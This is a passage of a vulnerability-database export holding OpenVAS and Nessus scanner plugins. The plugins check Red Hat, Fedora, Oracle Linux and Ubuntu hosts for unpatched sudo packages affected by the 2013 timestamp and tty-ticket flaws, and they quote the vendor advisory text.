{"lastseen": "2018-01-19T15:08:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776", "CVE-2013-2776"], "description": "Check for the Version of sudo", "modified": "2018-01-19T00:00:00", "published": "2013-10-03T00:00:00", "id": "OPENVAS:871048", "href": "http://plugins.openvas.org/nasl.php?oid=871048", "type": "openvas", "title": "RedHat Update for sudo RHSA-2013:1353-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for sudo RHSA-2013:1353-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(871048);\n script_version(\"$Revision: 8466 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-19 07:58:30 +0100 (Fri, 19 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-10-03 10:17:42 +0530 (Thu, 03 Oct 2013)\");\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\", \"CVE-2013-2776\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for sudo RHSA-2013:1353-01\");\n\n tag_insight = \"The sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker able\nto run code as a local user and with the ability to control the system\nclock could possibly gain additional privileges by running commands that\nthe victim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling terminal\ndevice when the tty_tickets option was enabled in the /etc/sudoers file. An\nattacker able to run code as a local user could possibly gain additional\nprivileges by running commands that the victim user was allowed to run via\nsudo, without knowing the victim's password. (CVE-2013-1776, CVE-2013-2776)\n\nThis update also fixes the following bugs:\n\n* Due to a bug in the cycle detection algorithm of the visudo utility,\nvisudo incorrectly evaluated certain alias definitions in the /etc/sudoers\nfile as cycles. Consequently, a warning message about undefined aliases\nappeared. This bug has been fixed, /etc/sudoers is now parsed correctly by\nvisudo and the warning message no longer appears. (BZ#849679)\n\n* Previously, the 'sudo -l' command did not parse the /etc/sudoers file\ncorrectly if it contained an Active Directory (AD) group. The file was\nparsed only up to the first AD group information and then the parsing\nfailed with the following message:\n\n sudo: unable to cache group ADDOM\\admingroup, already exists\n\nWith this update, the underlying code has been modified and 'sudo -l' now\nparses /etc/sudoers containing AD groups correctly. (BZ#855836)\n\n* Previously, the sudo utility did not escape the backslash characters\ncontained in user names properly. Consequently, if a system used sudo\nintegrated with LDAP or Active Directory (AD) as the primary authentication\nmechanism, users were not able to authenticate on that system. With this\nupdate, sudo has been modified to process LDAP and AD names correctly and\nthe authentication process now works as expected. (BZ#869287)\n\n* Prior to this update, the 'visudo -s (strict)' command incorrectly parsed\ncertain alias definitions. Consequently, an error message was issued. The\nbug has been fixed, and parsing errors no longer occur when using 'visudo\n- -s'. (BZ#905624)\n\nAll sudo users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues.\n\";\n\n tag_affected = \"sudo on Red Hat Enterprise Linux (v. 5 server)\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"RHSA\", value: \"2013:1353-01\");\n script_xref(name: \"URL\" , value: \"https://www.redhat.com/archives/rhsa-announce/2013-September/msg00055.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of sudo\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.7.2p1~28.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sudo-debuginfo\", rpm:\"sudo-debuginfo~1.7.2p1~28.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-18T11:08:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776", "CVE-2012-2337"], "description": "Check for the Version of sudo", "modified": "2018-01-17T00:00:00", "published": "2013-03-22T00:00:00", "id": "OPENVAS:865484", "href": "http://plugins.openvas.org/nasl.php?oid=865484", "type": "openvas", "title": "Fedora Update for sudo FEDORA-2013-3270", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for sudo FEDORA-2013-3270\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"sudo on Fedora 17\";\ntag_insight = \"Sudo (superuser do) allows a system administrator to give certain\n users (or groups of users) the ability to run some (or all) commands\n as root while logging all commands and arguments. Sudo operates on a\n per-command basis. It is not a replacement for the shell. Features\n include: the ability to restrict what commands a user may run on a\n per-host basis, copious logging of each command (providing a clear\n audit trail of who did what), a configurable timeout of the sudo\n command, and the ability to use the same configuration file (sudoers)\n on many different machines.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-March/100498.html\");\n script_id(865484);\n script_version(\"$Revision: 8448 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 17:18:06 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-22 10:37:00 +0530 (Fri, 22 Mar 2013)\");\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\", \"CVE-2012-2337\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2013-3270\");\n script_name(\"Fedora Update for sudo FEDORA-2013-3270\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of sudo\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.8.6p7~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776", "CVE-2013-2776"], "description": "Oracle Linux Local Security Checks ELSA-2013-1353", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123560", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123560", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2013-1353", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-1353.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123560\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:05:32 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-1353\");\n script_tag(name:\"insight\", value:\"ELSA-2013-1353 - sudo security and bug fix update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-1353\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-1353.html\");\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\", \"CVE-2013-2776\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.7.2p1~28.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-2777", "CVE-2013-2776"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2013-11-21T00:00:00", "id": "OPENVAS:1361412562310871085", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871085", "type": "openvas", "title": "RedHat Update for sudo RHSA-2013:1701-02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for sudo RHSA-2013:1701-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871085\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-21 10:44:31 +0530 (Thu, 21 Nov 2013)\");\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-2776\", \"CVE-2013-2777\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for sudo RHSA-2013:1701-02\");\n\n\n script_tag(name:\"affected\", value:\"sudo on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"insight\", value:\"The sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker able\nto run code as a local user and with the ability to control the system\nclock could possibly gain additional privileges by running commands that\nthe victim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling terminal\ndevice when the tty_tickets option was enabled in the /etc/sudoers file.\nAn attacker able to run code as a local user could possibly gain additional\nprivileges by running commands that the victim user was allowed to run via\nsudo, without knowing the victim's password. (CVE-2013-2776, CVE-2013-2777)\n\nThis update also fixes the following bugs:\n\n * Previously, sudo did not support netgroup filtering for sources from the\nSystem Security Services Daemon (SSSD). Consequently, SSSD rules were\napplied to all users even when they did not belong to the specified\nnetgroup. With this update, netgroup filtering for SSSD sources has been\nimplemented. As a result, rules with a netgroup specification are applied\nonly to users that are part of the netgroup. (BZ#880150)\n\n * When the sudo utility set up the environment in which it ran a command,\nit reset the value of the RLIMIT_NPROC resource limit to the parent's value\nof this limit if both the soft (current) and hard (maximum) values of\nRLIMIT_NPROC were not limited. An upstream patch has been provided to\naddress this bug and RLIMIT_NPROC can now be set to 'unlimited'.\n(BZ#947276)\n\n * Due to the refactoring of the sudo code by upstream, the SUDO_USER\nvariable that stores the name of the user running the sudo command was not\nlogged to the /var/log/secure file as before. Consequently, user name\n'root' was always recorded instead of the real user name. With this update,\nthe previous behavior of sudo has been restored. As a result, the expected\nuser name is now written to /var/log/secure. (BZ#973228)\n\n * Due to an error in a loop condition in sudo's rule listing code, a buffer\noverflow could have occurred in certain cases. This condition has been\nfixed and the buffer overflow no longer occurs. (BZ#994626)\n\nIn addition, this update adds the following enhancements:\n\n * With this update, sudo has been modified to send debug messages about\nnetgroup matching to the debug log. These messages should provide better\nunderstanding of how sudo matches netgroup d ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"RHSA\", value:\"2013:1701-02\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2013-November/msg00034.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'sudo'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.8.6p3~12.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sudo-debuginfo\", rpm:\"sudo-debuginfo~1.8.6p3~12.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-18T11:08:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-2777", "CVE-2013-2776"], "description": "Check for the Version of sudo", "modified": "2018-01-17T00:00:00", "published": "2013-11-21T00:00:00", "id": "OPENVAS:871085", "href": "http://plugins.openvas.org/nasl.php?oid=871085", "type": "openvas", "title": "RedHat Update for sudo RHSA-2013:1701-02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for sudo RHSA-2013:1701-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(871085);\n script_version(\"$Revision: 8448 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 17:18:06 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-21 10:44:31 +0530 (Thu, 21 Nov 2013)\");\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-2776\", \"CVE-2013-2777\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for sudo RHSA-2013:1701-02\");\n\n tag_insight = \"The sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker able\nto run code as a local user and with the ability to control the system\nclock could possibly gain additional privileges by running commands that\nthe victim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling terminal\ndevice when the tty_tickets option was enabled in the /etc/sudoers file.\nAn attacker able to run code as a local user could possibly gain additional\nprivileges by running commands that the victim user was allowed to run via\nsudo, without knowing the victim's password. (CVE-2013-2776, CVE-2013-2777)\n\nThis update also fixes the following bugs:\n\n* Previously, sudo did not support netgroup filtering for sources from the\nSystem Security Services Daemon (SSSD). Consequently, SSSD rules were\napplied to all users even when they did not belong to the specified\nnetgroup. With this update, netgroup filtering for SSSD sources has been\nimplemented. As a result, rules with a netgroup specification are applied\nonly to users that are part of the netgroup. (BZ#880150)\n\n* When the sudo utility set up the environment in which it ran a command,\nit reset the value of the RLIMIT_NPROC resource limit to the parent's value\nof this limit if both the soft (current) and hard (maximum) values of\nRLIMIT_NPROC were not limited. An upstream patch has been provided to\naddress this bug and RLIMIT_NPROC can now be set to 'unlimited'.\n(BZ#947276)\n\n* Due to the refactoring of the sudo code by upstream, the SUDO_USER\nvariable that stores the name of the user running the sudo command was not\nlogged to the /var/log/secure file as before. Consequently, user name\n'root' was always recorded instead of the real user name. With this update,\nthe previous behavior of sudo has been restored. As a result, the expected\nuser name is now written to /var/log/secure. (BZ#973228)\n\n* Due to an error in a loop condition in sudo's rule listing code, a buffer\noverflow could have occurred in certain cases. This condition has been\nfixed and the buffer overflow no longer occurs. (BZ#994626)\n\nIn addition, this update adds the following enhancements:\n\n* With this update, sudo has been modified to send debug messages about\nnetgroup matching to the debug log. These messages should provide better\nunderstanding of how sudo matches netgroup d ...\n\n Description truncated, for more information please check the Reference URL\";\n\n tag_affected = \"sudo on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"RHSA\", value: \"2013:1701-02\");\n script_xref(name: \"URL\" , value: \"https://www.redhat.com/archives/rhsa-announce/2013-November/msg00034.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of sudo\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.8.6p3~12.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sudo-debuginfo\", rpm:\"sudo-debuginfo~1.8.6p3~12.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-01T06:39:17", "description": "Marco Schoepl discovered that Sudo incorrectly handled time stamp\nfiles when the system clock is set to epoch. A local attacker could\nuse this issue to run Sudo commands without a password prompt.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2013-03-01T00:00:00", "title": "Ubuntu 8.04 LTS / 10.04 LTS / 11.10 / 12.04 LTS / 12.10 : sudo vulnerability (USN-1754-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:11.10", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "cpe:/o:canonical:ubuntu_linux:12.10", "p-cpe:/a:canonical:ubuntu_linux:sudo-ldap", "p-cpe:/a:canonical:ubuntu_linux:sudo", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-1754-1.NASL", "href": "https://www.tenable.com/plugins/nessus/64969", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1754-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64969);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/09/19 12:54:29\");\n\n script_cve_id(\"CVE-2013-1775\");\n script_bugtraq_id(58203);\n script_xref(name:\"USN\", value:\"1754-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 10.04 LTS / 11.10 / 12.04 LTS / 12.10 : sudo vulnerability (USN-1754-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Marco Schoepl discovered that Sudo incorrectly handled time stamp\nfiles when the system clock is set to epoch. A local attacker could\nuse this issue to run Sudo commands without a password prompt.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1754-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected sudo and / or sudo-ldap packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Sudo Password Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:sudo-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(8\\.04|10\\.04|11\\.10|12\\.04|12\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 10.04 / 11.10 / 12.04 / 12.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"sudo\", pkgver:\"1.6.9p10-1ubuntu3.10\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"sudo-ldap\", pkgver:\"1.6.9p10-1ubuntu3.10\")) flag++;\nif (ubuntu_check(osver:\"10.04\", 